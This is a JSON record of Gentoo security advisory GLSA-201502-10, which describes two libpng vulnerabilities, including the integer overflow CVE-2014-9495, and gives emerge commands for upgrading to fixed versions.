[{"lastseen": "2016-09-06T19:46:33", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9495", "https://bugs.gentoo.org/show_bug.cgi?id=531264", "http://www.libpng.org/pub/png/src/libpng-1.6.15-README.txt", "https://bugs.gentoo.org/show_bug.cgi?id=533358"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "1.6.16", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "media-libs/libpng", "operator": "lt"}], "edition": 1, "description": "### Background\n\nlibpng is a standard library used to process PNG (Portable Network Graphics) images. It is used by several programs, including web browsers and potentially server processes. \n\n### Description\n\nTwo vulnerabilities have been discovered in libpng:\n\n * The png_user_version_check function contains an out-of-bounds memory access error (libpng 1.6.15 Release Notes) \n * The png_combine_row function contains an integer overflow error, which could result in a heap-based buffer overflow (CVE-2014-9495) \n\n### Impact\n\nA context-dependent attacker could entice a user to open a specially crafted PNG file using an application linked against libpng, possibly resulting in execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll libpng 1.6 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/libpng-1.6.16\"\n \n\nAll libpng 1.5 users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/libpng-1.5.21\"", "reporter": "Gentoo Foundation", "published": "2015-02-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "gentoo", "title": "libpng: User-assisted execution of arbitrary code", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9495"], "modified": "2015-06-06T00:00:00", "id": "GLSA-201502-10", "href": "https://security.gentoo.org/glsa/201502-10", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}}
